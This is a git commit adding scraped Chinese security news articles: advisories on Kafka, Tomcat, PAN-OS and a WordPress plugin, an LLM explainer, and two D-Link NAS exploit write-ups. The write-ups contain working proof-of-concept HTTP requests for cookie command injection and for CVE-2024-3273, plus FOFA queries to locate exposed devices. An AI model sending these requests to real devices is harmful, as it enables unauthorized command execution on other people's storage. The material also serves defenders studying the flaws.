渗透测试 -- 漏洞百解、美国饮用水系统存在300多个漏洞,影响1.1亿人、微软2024年11月补丁日重点漏洞安全预警、【漏洞预警】Apache Kafka Clients权限管理不当漏洞可致信息泄露、【漏洞预警】Palo Alto Networks PAN-OS Web管理界面身份验证缺陷漏洞、【漏洞预警】Apache Tomcat资源控制不当漏洞、「人脑替代计划-6」LLM是什么?、漏洞挖掘|电子商城类漏洞挖掘案例灵感复现、「漏洞复现」D-Link NAS设备 sc_mgr.cgi 未授权漏洞、漏洞预警|Apache OFBiz远程代码执行漏洞(CVE-2024-47208)、漏洞预警|Palo Alto Networks PAN-OSS身份验证绕过等多个漏洞、YAK 亮相2024年世界互联网大会!携手中国联通共塑网络安全新生态、关键的WordPress插件漏洞导致超400万网站暴露、【漏洞复现】D-Link NAS 远程命令执行漏洞(CVE-2024-3273)、

This commit is contained in:
test 2024-11-19 16:13:54 +00:00
parent 3a2b63ef47
commit de87812e29
15 changed files with 1023 additions and 47 deletions

View File

@ -206,5 +206,19 @@
"https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247523853&idx=2&sn=44f939a81178afad27dca90a02dfbfc6": "【漏洞通告】Apache OFBiz远程代码执行漏洞(CVE-2024-47208)",
"https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&mid=2247523853&idx=3&sn=fab3ee466334a0022b2df23ab6a23217": "上周关注度较高的产品安全漏洞(20241111-20241117)",
"https://mp.weixin.qq.com/s?__biz=MzUzOTE2OTM5Mg==&mid=2247490175&idx=1&sn=8a88f13080b38ee937638a6ab1a1a319": "【风险通告】Palo Alto Networks PAN-OS存在身份验证绕过漏洞CVE-2024-0012",
"https://mp.weixin.qq.com/s?__biz=Mzg5MTc3ODY4Mw==&mid=2247507416&idx=1&sn=6eb8217321fbe1a5361675058bc55882": "已知漏洞!宝兰德最新漏洞绕过补丁黑名单,速修"
"https://mp.weixin.qq.com/s?__biz=Mzg5MTc3ODY4Mw==&mid=2247507416&idx=1&sn=6eb8217321fbe1a5361675058bc55882": "已知漏洞!宝兰德最新漏洞绕过补丁黑名单,速修",
"https://mp.weixin.qq.com/s?__biz=MzU3NzY3MzYzMw==&mid=2247498607&idx=2&sn=2e4002dc2db4869990ee4fa3d38f1f43": "渗透测试 -- 漏洞百解",
"https://mp.weixin.qq.com/s?__biz=MzI5NTM4OTQ5Mg==&mid=2247632338&idx=3&sn=287c0b4f0cfbdbc1d11e7f8b67787249": "美国饮用水系统存在300多个漏洞影响1.1亿人",
"https://mp.weixin.qq.com/s?__biz=MzUzMDUxNTE1Mw==&mid=2247508728&idx=1&sn=50e200ae59cd278b496fa675d916a377": "微软2024年11月补丁日重点漏洞安全预警",
"https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247489184&idx=1&sn=04ec9cf838fb1a5cf5cc4c8c93a8bf30": "【漏洞预警】Apache Kafka Clients权限管理不当漏洞可致信息泄露",
"https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247489184&idx=2&sn=6674f470ab506ed8239b4103f4d11218": "【漏洞预警】Palo Alto Networks PAN-OS Web管理界面身份验证缺陷漏洞",
"https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247489184&idx=3&sn=22ce05bbdff66ec1bf477e37c429c327": "【漏洞预警】Apache Tomcat资源控制不当漏洞",
"https://mp.weixin.qq.com/s?__biz=Mzg4NzgyODEzNQ==&mid=2247488403&idx=3&sn=9914510e560c5eec5ad6282278ab6577": "「人脑替代计划-6」LLM是什么",
"https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247517233&idx=1&sn=af475bf0f3de0493fd24dcdc37463e5a": "漏洞挖掘|电子商城类漏洞挖掘案例灵感复现",
"https://mp.weixin.qq.com/s?__biz=MzkyNDY3MTY3MA==&mid=2247486072&idx=1&sn=7558c8a2becda935fa6b7237363f864e": "「漏洞复现」D-Link NAS设备 sc_mgr.cgi 未授权漏洞",
"https://mp.weixin.qq.com/s?__biz=Mzg2Mjc3NTMxOA==&mid=2247515356&idx=1&sn=202c8573e3a77824edf45e865b30e051": "漏洞预警Apache OFBiz远程代码执行漏洞(CVE-2024-47208)",
"https://mp.weixin.qq.com/s?__biz=Mzg2Mjc3NTMxOA==&mid=2247515356&idx=2&sn=d677b50ea4f958d207cd6a3c772fe0b8": "漏洞预警Palo Alto Networks PAN-OSS身份验证绕过等多个漏洞",
"https://mp.weixin.qq.com/s?__biz=MzIwMzI1MDg2Mg==&mid=2649945063&idx=1&sn=e933d8e9d2243641c8f007c652caad48": "YAK 亮相2024年世界互联网大会携手中国联通共塑网络安全新生态",
"https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651307419&idx=3&sn=9f3e2546a68551118a2b2bc765b70ab3": "关键的WordPress插件漏洞导致超400万网站暴露",
"https://mp.weixin.qq.com/s?__biz=MzkyMjcxNzE2MQ==&mid=2247484334&idx=1&sn=bfd4f94e969ee9f8e7ec653c0feae32a": "【漏洞复现】D-Link NAS 远程命令执行漏洞(CVE-2024-3273)"
}

View File

@ -0,0 +1,19 @@
# YAK 亮相2024年世界互联网大会携手中国联通共塑网络安全新生态
MegaVector 万径安全 2024-11-19 12:03
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/qdI65GS20NQQicuyMeMLu91BicIfGa3MicPLg2dic9GvNoVerFfMh2Vib8hicVFsuI4Cq4MtlTMj0QickZefFU1Ria00WQ/640?wx_fmt=gif&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/qdI65GS20NRDMpsH80cZLM0NAhA3e6YngfTtFqEicLpwKzHjMWTYyicB7lxGZXfpVveH5rLpShgyfdicyKalOicP6w/640?wx_fmt=jpeg&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/MVPvEL7Qg0FhwyFd6snAVxesxNeE1t3B9iaUao0eP0VV4u7bNnLEEr1micZb2lPyCnHWKkRgcBbu0t8dEULLQUvA/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
**关于万径安全**
万径安全是网络安全行业知名的专精特新企业,致力于为用户提供全面、高效、安全的网络安全解决方案。
公司以 “AI+YAK” 为企业核心战略专注于网络安全基础设施和智能化技术研究打造了首款国产安全语言 Yaklang 和网络安全专用 AI大模型万径千机ChatCS两大核心并基于 YAK 构建自主可控的网络安全生态体系,推动安全产业融合发展,产品已广泛应用于能源、金融、运营商等多个行业
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/qdI65GS20NTIgD8ibRvLqV8PEQwkTFQfej43Rlxl7gZa4ZDlImM0TGFbQgnyKFyY3bVIxaHRuTtr962uxQ8PznA/640?wx_fmt=gif&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")

View File

@ -0,0 +1,153 @@
# 「人脑替代计划-6」LLM是什么
原创 破天KK KK安全说 2024-11-19 13:37
# 大型语言模型在生成人工智能中的应用如何?
我们以ChatGPT为例来直观地理解一下。ChatGPT 的众多功能中其中之一就是理解人类语言用简单的话提出问题。它还可以产生我们人类可以理解的反应。ChatGPT 与人类交流的这种能力是由大型语言模型提供支持的。
换句话说,我们可以说——
一个需要生成类似人类文本的生成式人工智能系统需要大型语言模型。
我们再通俗一点来分解一下吧!
# 什么是语言模型?
我们先来了解一下什么是语言模型。
语言模型是:
- 一种机器学习模型
- 它使用各种统计和概率技术
- 预测句子或短语中给定单词序列的概率。
简而言之,语言模型旨在根据给定句子/短语的上下文预测下一个最合适的单词来填充句子或短语中的空白。
我们举个例子来更好地理解!
当我们在手机中使用消息传递应用程序时它可以通过在我们输入消息时预测下一个单词来帮助我们。例如一旦我们输入“how”
手机可能会建议“are”或“is”
之类的单词因为它知道这些单词通常出现在句子中的“how”之后。
同样,如果我们输入“我要去”,
手机可能会预测“商店”、“公园”、“办公室”
或“海滩”
等单词,因为这些是日常语言中“去”之后的常见单词。
该预测是根据我们迄今为止输入的内容以及通过分析大量文本学到的模式做出的。
# 大语言模型LLM
大语言模型 (LLM) 是一种以下语言模型:
- 一种机器学习模型
- 在大型文本数据集上进行训练
- 并使用先进的神经网络架构
- 生成或预测类似人类的文本。
回到我们之前的例子,语言模型可以帮助人工智能工具预测句子中即将出现的单词。
下图总结了有关大型语言模型的要点。
大型语言模型最独特和最强大的一点是它们
能够根据大量数据生成类似人类的文本、总结和预测内容。
法学硕士可以处理和分析大量文本数据,使他们能够高度熟练地完成文本生成、摘要、翻译和情感分析等语言处理任务。
# 自然语言处理NLP
自然语言处理是一个与法学硕士密切相关的重要概念。
自然语言处理NLP是人工智能的一个子集它专注于计算机和人类通过自然语言例如英语进行交互。
- NLP是指使计算机能够理解人类语言并用同一种语言与我们交流的过程。
- NLP 使用算法来分析、理解和生成人类语言。
- 它还可以帮助计算机理解单词和句子背后的上下文和情感。
我们再举一个例子来更好地理解NLP。虚拟助手例如 Siri可以使用 NLP 理解并响应我们的命令。
想象一下你问 Siri“设置明天早上 7 点的闹钟。”
- Siri 的 NLP 算法分析句子,将其分解为单个单词并理解它们的含义、语法和上下文。
- NLP算法将能够理解用户的意图即设置闹钟。
- 此外Siri 还会执行命令中指定的操作,在您的设备上设置第二天早上 7 点的闹钟。
- 最后Siri 会用您的语言给出回复。
自然语言处理是人类响应(例如 ChatGPT、语言翻译、搜索引擎等任务的支柱。
# 自然语言处理 (NLP) 和大语言模型 (LLM)
大型语言模型可以被视为自然语言处理模型的演变。
换句话说,我们可以说大型语言模型是为 NLP 任务设计的任何模型,重点是理解和生成类似人类的文本。
虽然 NLP 包含广泛的用于处理人类语言的模型和技术但法学硕士专注于理解和生成类人文本。LLM 专门设计用于根据单词或句子之前的单词来预测该单词或句子的概率,从而使它们能够生成连贯且上下文相关的文本。
从机器学习技术的角度来看,自然语言处理使用了广泛的技术,从基于规则的方法到机器学习和深度学习方法。
另一方面,大型语言模型主要使用深度学习技术来理解文本数据中的模式和上下文,以预测序列中下一个单词的概率。法学硕士是基于人工神经网络架构设计的。
大多数大型语言模型都是基于基于转换器的模型。
# 大语言模型与生成式人工智能有何关系?
大型语言模型 (LLM) 是
生成式 AI 的一个子集
。虽然生成式人工智能可以生成多种类型的内容,例如文本、图像、视频、代码、音乐等,但法学硕士仅专注于生成文本。
# 在哪里/使用多大的语言模型?
大型语言模型 (LLM) 用于不同行业的各种人工智能应用程序。以下是一些主要示例:
虚拟助理
LLM 模型是为 Siri、Alexa 或 Google Assistant 等虚拟助手提供支持的引擎。LLM 模型分析人类命令并解释其含义,帮助这些虚拟助手代表用户执行多项操作。
聊天机器人
ChatGPT 不再是一个新词了。我们大多数人都使用过它或类似的人工智能对话聊天机器人。这些聊天机器人使用大型语言模型以模仿人类语言的方式理解人类问题和响应。
语言翻译
大型语言模型在谷歌翻译等人工智能工具完成的语言翻译中发挥着重要作用。这些模型经过大量多语言文本数据的训练,这使它们能够捕捉不同语言的细微差别、变化、上下文和复杂性。
当我们要求翻译工具翻译句子时,它使用 LLM 算法来分析一种语言的输入文本,并以目标语言生成准确且适合上下文的翻译。
通过双向考虑两种语言中单词和短语之间的关系,法学硕士可以生成保留原文含义和语气的翻译。
文本生成
如今大型语言模型在许多应用程序中用于生成类似人类的文本。这些模型非常复杂可以根据给定的提示或输入生成连贯且上下文相关的文本。LLM 模型可用于撰写故事、生成产品描述、撰写电子邮件等等。
总结
大型语言模型对于进行文档摘要非常有用。利用自然语言处理能力LLM模型可以将冗长的文档或文章总结为简洁的摘要同时保留关键信息和要点。使用注意力机制和上下文理解等技术法学硕士可以确定摘要中包含的最显着的信息确保其抓住原文的本质。
情感分析
情感分析是确定文本中表达的情感或情绪基调的过程。大型语言模型可用于分析大量文本数据,理解语言的上下文、细微差别和语气,并识别情绪极性(积极、消极或中性)。
如今,许多组织使用大型语言模型来识别来自社交媒体帖子、产品评论、客户反馈、新闻文章等的文本数据中的情绪。
内容推荐
Netflix、YouTube、Amazon 等平台越来越多地使用大型语言模型 (LLM) 进行内容推荐,为用户提供更加个性化和相关的建议。这些模型捕获单词、短语和主题之间的关系,使他们能够理解内容的含义和上下文。在内容推荐方面,法学硕士会分析用户与内容的交互,例如他们阅读过的文章、购买过的产品或观看过的视频。根据这些数据,法学硕士可以预测用户可能感兴趣的其他内容并建议相关选项。
# 大型语言模型的一些流行示例
以下是一些使用大型语言模型的流行应用程序。
# GPT生成式预训练变压器
生成式预训练 Transformer 可能是最流行的大型语言模型,在 ChatGPT 中使用。在 2017 年引入 Transformer 架构后OpenAI 在 2018 年发布了 GPT-1作为他们第一个基于 Transformer 的大型语言模型。GPT-1 最初在 BookCorpus 上进行训练,该数据集包含 7000 多本自行出版的书籍。
随后OpenAI 发布了更高级的 GPT 版本GPT-2、GPT-3、GPT-3.5 和 GPT-4。所有这些都是基于 Transformer 的大语言模型。GPT-4 是一种多模式模型,这意味着它可以将图像和文本作为输入。
# BERT来自 Transformers 的双向编码器表示)
BERT 由 Google 于 2018 年推出,是一种基于 Transformer 的大型语言模型。BERT 代表了大语言模型和自然语言处理领域的重大进步。它是一种双向 Transformer 模型,可以并行处理单词,与循环神经网络 (RNN) 等传统顺序模型相比,效率更高。
# LaMDA对话应用语言模型
LaMDA是会话式大语言模型由Google开发也是一个基于Transformer的模型。ChatGPT 突然崛起后,谷歌宣布推出自己的对话式 AI 聊天机器人“Bard”。巴德由 LaMDA 提供支持。
后来Google推出了PaLMPathways Language Model作为LaMDA的继承者。此外2024 年,谷歌将 Bard 重新命名为新名称“Gemini”。Gemini 由同名的大语言模型 (LLM) 提供支持。Gemini 多模态大语言模型是 LaMDA 和 PaLM 的继承者。
# LLaMA大型语言模型元人工智能
LLaMALarge Language Model Meta AI是 Meta AI 推出的一组大型语言模型LLM。LLaMA 是一种自回归语言模型,建立在 Transformer 架构之上。

View File

@ -0,0 +1,122 @@
# 「漏洞复现」D-Link NAS设备 sc_mgr.cgi 未授权漏洞
冷漠安全 冷漠安全 2024-11-19 13:01
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/rPMtsalfZ0pFeDPJNnYaE7pYibBLQrUbLZwqelcotCqhYf0seBKfHroSUm8XuHyka5I3SmicWcJYUpZbFmxJCZ1Q/640?wx_fmt=gif&from=appmsg "")
**0x01 免责声明**
**免责声明**
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
0x02
**产品介绍**
D-Link NAS设备是一种基于网络的存储解决方案作为网络存储设备旨在为企业提供大容量的存储空间并通过网络连接实现数据的访问和管理。这种设备不仅满足了企业对数据存储的需求还提供了高效的数据共享和访问功能提升了企业数据管理的效率和灵活性。广泛应用于各种企业场景如文档存储、图片和视频存储、数据库备份等。特别是在需要高效数据共享和访问的企业环境中如设计工作室、广告公司、医疗机构等D-Link NAS设备更是发挥了其强大的功能和优势。
0x03
**漏洞威胁**
D-Link NAS设备 /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info 接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统命令,写入后门文件,获取服务器权限。
0x04
**漏洞环境**
FOFA:
```
body="/cgi-bin/login_mgr.cgi" && body="cmd=cgi_get_ssl_info"
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ruUrXMjkUsib97HAHBCdXRFmEVfFzhXHCf9ELphCHVQ3Hia7VKyBNjlw322jNCxamRB1kAWXXkLdicQ/640?wx_fmt=png&from=appmsg "")
0x05
**漏洞复现**
PoC
```
GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Cookie: username=mopfdfsewo'& id & echo 'mopfdfsewo;
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ruUrXMjkUsib97HAHBCdXRF35gWgFzWQZJ3VgGPewmmDDYDL46ksQpOvQ9ibLj1v6QoBVBmVLKJPIA/640?wx_fmt=png&from=appmsg "")
0x06
**批量脚本验证**
Nuclei验证脚本已发布
知识星球:冷漠安全
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ruUrXMjkUsib97HAHBCdXRFJTQY0kckZBZ3x4iagPc1Fsu39Ek3gldlVfMic3KdApsohvxBu5GnczAg/640?wx_fmt=png&from=appmsg "")
0x07
**修复建议**
应用补丁和更新: 用户应下载并安装 D-Link 提供的任何固件更新。
限制网络访问: 作为临时措施,对 NAS 管理界面的网络访问应仅限于受信任的 IP 地址。
监控固件更新: 受影响的设备用户应密切关注 D-Link 即将提供的任何安全补丁。
0x08
**加入我们**
漏洞详情及批量检测POC工具请前往知识星球获取
知识星球冷漠安全交个朋友限时优惠券加入立减25星球福利每天更新最新漏洞POC、资料文献、内部工具等
![](https://mmbiz.qpic.cn/sz_mmbiz_png/rPMtsalfZ0ruUrXMjkUsib97HAHBCdXRF8oHYFian8HYKOxD5G4XaE4AyMtyjQG5a8P2mvsLwGaaUud4919fFS0w/640?wx_fmt=png&from=appmsg "")
「星球介绍」:
本星球不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意三天退款。
本星球坚持每天分享一些攻防知识,包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。
本星主已加入几十余个付费星球,定期汇聚高质量资料及工具进行星球分享。
「星球服务」:
加入星球,你会获得:
♦ 批量验证漏洞POC脚本
♦ 0day、1day分享
♦ 汇集其它付费星球资源分享
♦ 大量的红蓝对抗实战资源
♦ 优秀的内部红蓝工具及插件
♦ 综合类别优秀Wiki文库及漏洞库
♦ 提问及技术交流
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/rPMtsalfZ0ruUrXMjkUsib97HAHBCdXRFr7DSEvkicFibVdQpy85tjhFeVHsLL0lDkmBo9mDEdX50ObYFoDPrlXiag/640?wx_fmt=gif&from=appmsg "")

View File

@ -0,0 +1,46 @@
# 【漏洞复现】D-Link NAS 远程命令执行漏洞(CVE-2024-3273)
原创 清风 白帽攻防 2024-11-19 09:52
## 免责声明:请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
简介
D-Link NAS网络附加存储是通过网络连接的存储设备允许多个设备共享和存储数据。作为一家知名的网络设备品牌D-Link 提供多种 NAS 解决方案,广泛应用于家庭和企业环境中。
![](https://mmbiz.qpic.cn/mmbiz_png/yu6trpdUX0dakQkvYTcT4pr9bd9LAZXfXfds3MLKp08Xnf2cpkQ3icXT4wlXTbNZAr9AiaftKI5f2pZshDcPUMAw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
漏洞描述
通过硬编码帐户用户名“messagebus”和空密码造成的后门以及“system”参数的命令注入问题攻击者可在设备上远程执行命令。命令注入漏洞通过 HTTP GET 请求将 Base64 编码的命令添加到“system”参数中从而被执行。
影响版本```
DNS-320L
DNS-325
DNS-327L
DNS-340L
```
fofa语法```
fid="hWN+yVVhLzKJaLkd/ITHpA=="
```
漏洞复现```
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHdk HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeUpgrade-Insecure-Requests: 1Priority: u=0, i
```
![](https://mmbiz.qpic.cn/mmbiz_png/yu6trpdUX0dsnxBzMsDoZLEIJ5Ricybib7SFknZCecWDuRrGSibbN3jTJCQ4oN3ib3InyYksm6wpty7eibvbdwziaiaibg/640?wx_fmt=png&from=appmsg "")
批量检测批量检测POC工具请在公众号知识星球获取
![](https://mmbiz.qpic.cn/mmbiz_png/yu6trpdUX0dsnxBzMsDoZLEIJ5Ricybib762CzKibvlGhDf9uMNv7NxyZpPPbIZtOyR06sfxwBBt5JtJVhWbL7dUQ/640?wx_fmt=png&from=appmsg "")
修复建议
1、关闭互联网暴露面或接口
2、及时更新补丁或升级至安全版本
网安交流群
![](https://mmbiz.qpic.cn/mmbiz_jpg/yu6trpdUX0efFOzibVic3qjn100tFgpUIh7ib8g9cKajewKFM5kXP350q21SCLvlgO6yx1tlia8VYxI4j3cv57FqFg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")

View File

@ -0,0 +1,7 @@
# 【漏洞预警】Apache Kafka Clients权限管理不当漏洞可致信息泄露
cexlife 飓风网络安全 2024-11-19 13:50
![](https://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu019dc8yxarexIEx97oF3hOtlTibx7hfaz4tCFJPXcoJxUDS1GYa7gG4Hxh5VyaHSqeHFKmNZ8PnpGQ/640?wx_fmt=png&from=appmsg "")
**漏洞描述:**Kafka官方发布安全公告,修复了Apache Kafka Clients中存在的一处权限管理不当漏洞,可导致文件和目录可被外部访问。该漏洞是由于Apache Kafka Clients的配置可能被不可信方指定,攻击者可利用ConfigProvider插件读取磁盘内容和环境变量,官方已针对此漏洞发布3.8.0版本,建议受影响用户升级 kafka-clients到3.8.0及以上版本以缓解此漏洞。**修复建议:正式防护方案:**针对此漏洞,官方已经发布了漏洞修复版本,请立即更新到安全版本:Apache Kafka Clients >= 3.8.0**下载链接:**https://kafka.apache.org/downloads安装前请确保备份所有关键数据并按照官方指南进行操作。安装后进行全面测试以验证漏洞已被彻底修复并确保系统其他功能正常运行。**参考链接:**https://lists.apache.org/thread/9whdzfr0zwdhr364604w5ssnzmg4v2lv

View File

@ -0,0 +1,11 @@
# 【漏洞预警】Apache Tomcat资源控制不当漏洞
cexlife 飓风网络安全 2024-11-19 13:50
![](https://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu019dc8yxarexIEx97oF3hOtXLFQBJs0iaF1c3JyughvqDwoia4TpMryRWGXQd5gpKLoXY3bQ6g73eHg/640?wx_fmt=png&from=appmsg "")
**漏洞描述:**Apache Tocmat发布安全公告,其中公开了一个Apache Tomcat资源控制不当漏洞,由于对HTTP/2使用的请求和响应的错误回收,可能导致用户之间的请求和/或响应发生混淆,造成数据泄露。**修复建议:正式防护方案:**厂商已发布补丁修复漏洞,建议下载相关补丁或联系厂商获取相关支持尽快更新至安全版本。**安全版本:**Apache tomcat >= 9.0.96Apache tomcat >= 10.1.31Apache tomcat >= 11.0.0
与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。
**参考链接:**https://lists.apache.org/thread/ty376mrxy1mmxtw3ogo53nc9l3co3dfs

View File

@ -0,0 +1,9 @@
# 【漏洞预警】Palo Alto Networks PAN-OS Web管理界面身份验证缺陷漏洞
cexlife 飓风网络安全 2024-11-19 13:50
![](https://mmbiz.qpic.cn/mmbiz_png/ibhQpAia4xu019dc8yxarexIEx97oF3hOtVbChSjONCc2qoicWwDX4RzpPaFz0u5e78IibprGAdn9lrHAciarEzYWkQ/640?wx_fmt=png&from=appmsg "")
**漏洞描述:**
Palo Alto Networks发布安全公告,披露了PAN--OS软件Web管理界面中存在认证绕过漏洞,未经身份验证的攻击者如果能够访问管理Web界面,就可能获得PAN-OS管理员权限,从而执行管理操作、篡改配置,结合利用其他需认证的漏洞可实现系统的完全控制,若按照推荐的最佳实践部署指南,将管理Web界面的访问限制为仅受信任的内部IP地址,可大大降低此风险,官方已提供此漏洞的修复版本,建议受影响用户及时升级到安全版本。**修复建议:正式防护方案:**针对此漏洞,官方已经发布了漏洞修复版本,请立即更新到安全版本:**Additional PAN-OS 11.2修复版本:**11.2.0-h111.2.1-h111.2.2-h211.2.3-h311.2.4-h1**Additional PAN-OS 11.1修复版本:**11.1.0-h411.1.1-h211.1.2-h1511.1.3-h1111.1.4-h711.1.5-h1**Additional PAN-OS 11.0 修复版本:**11.0.0-h411.0.1-h511.0.2-h511.0.3-h1311.0.4-h611.0.5-h211.0.6-h1**Additional PAN-OS 10.2 修复版本:**10.2.0-h410.2.1-h310.2.2-h610.2.3-h1410.2.4-h3210.2.5-h910.2.6-h610.2.7-h1810.2.8-h1510.2.9-h1610.2.10-h910.2.11-h610.2.12-h2安装前请确保备份所有关键数据并按照官方指南进行操作。安装后进行全面测试以验证漏洞已被彻底修复并确保系统其他功能正常运行。

View File

@ -0,0 +1,84 @@
# 关键的WordPress插件漏洞导致超400万网站暴露
bug胤 FreeBuf 2024-11-19 11:35
![](https://mmbiz.qpic.cn/mmbiz_gif/oQ6bDiaGhdyoFWEgZIHic7sqnootFEuOic7RlQNGhKY6d2ZESG3WpiaTMRlD0z4xO6mQrTZjkWHCkMpO2QtCfUJH6g/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "")
据Wordfence安全研究员István Márton披露一个关键的认证绕过了漏洞被暴露在了WordPress的Really Simple Security以前称为Really Simple SSL插件中如果此漏洞被利用攻击者可以远程获得易受攻击网站的完全管理权限。
这个漏洞被追踪为CVE-2024-10924CVSS评分9.8影响插件的免费和付费版本。该软件安装在超过400万个WordPress网站上。这个漏洞是可以脚本化的意味着它可以被转换成大规模的自动化攻击针对WordPress网站。
![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR39uD8TzUAG6icPT99CvicxqoBSkNWtqpz4GykYkgUZosXLbOZSBaz720OESmAoeZZOUKGNTCMopP8kA/640?wx_fmt=png&from=appmsg "")
这个漏洞在2024年11月6日披露在一周后发布的9.1.2版本中已被修补。
可能是有被滥用的风险促使插件维护者与WordPress合作在公开披露之前强制更新了所有运行此插件的网站。
根据Wordfence的说法这个认证绕过漏洞存在于9.0.0至9.1.1.1版本中起因是在一个名为“check_login_and_get_user”的函数中不正确的用户检查错误处理添加双因素认证的一个特性做得不够安全使得未经认证的攻击者可以在双因素认证启用时通过一个简单的请求获得对任何用户账户的访问权限包括管理员账户。
成功利用这个漏洞可能会有严重的后果因为它可能允许恶意行为者劫持WordPress网站并进一步将它们用于犯罪目的。
这一信息是Wordfence在透露了WPLMS学习管理系统WordPress LMSCVE-2024-10470CVSS评分9.8)中的另一个关键缺陷几天后发布的,该缺陷可能允许未经认证的威胁者读取和删除任意文件。
具体来说4.963之前的版本由于文件路径验证和权限检查不足这使得未经认证的攻击者能够读取和删除服务器上的任何任意文件包括网站的wp-config.php文件。删除wp-config.php文件会使网站进入设置状态允许攻击者通过将其连接到他们控制的数据库来发起对网站的接管。
FreeBuf粉丝交流群招新啦
在这里,拓宽网安边界
甲方安全建设干货;
乙方最新技术理念;
全球最新的网络安全资讯;
群内不定期开启各种抽奖活动;
FreeBuf盲盒、大象公仔......
扫码添加小蜜蜂微信回复「加群」,申请加入群聊
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR3ich6ibqlfxbwaJlDyErKpzvETedBHPS9tGHfSKMCEZcuGq1U1mylY7pCEvJD9w60pWp7NzDjmM2BlQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/oQ6bDiaGhdyodyXHMOVT6w8DobNKYuiaE7OzFMbpar0icHmzxjMvI2ACxFql4Wbu2CfOZeadq1WicJbib6FqTyxEx6Q/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ61icYlLmBLDpdYEZ7nIzpGovpHjtxITB6ibiaC3R5hoibVkQsVLQfdK57w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "")
> https://thehackernews.com/2024/11/urgent-critical-wordpress-plugin.html
>
>
>
>
>
>
>
>
>
>
>
>
>
>
![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ7JfyOicficFrgrD4BHnIMtgCpBbsSUBsQ0N7pHC7YpU8BrZWWwMMghoQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302087&idx=1&sn=29d91904d6471c4b09f4e574ba18a9b2&chksm=bd1c3a4c8a6bb35aa4ddffc0f3e2e6dad475257be18f96f5150c4e948b492f32b1911a6ea435&token=21436342&lang=zh_CN&scene=21#wechat_redirect)
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302006&idx=1&sn=18f06c456804659378cf23a5c474e775&scene=21#wechat_redirect)
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651253272&idx=1&sn=82468d927062b7427e3ca8a912cb2dc7&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_gif/qq5rfBadR3icF8RMnJbsqatMibR6OicVrUDaz0fyxNtBDpPlLfibJZILzHQcwaKkb4ia57xAShIJfQ54HjOG1oPXBew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "")

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,36 @@
# 渗透测试 -- 漏洞百解
网络安全者 2024-11-19 16:00
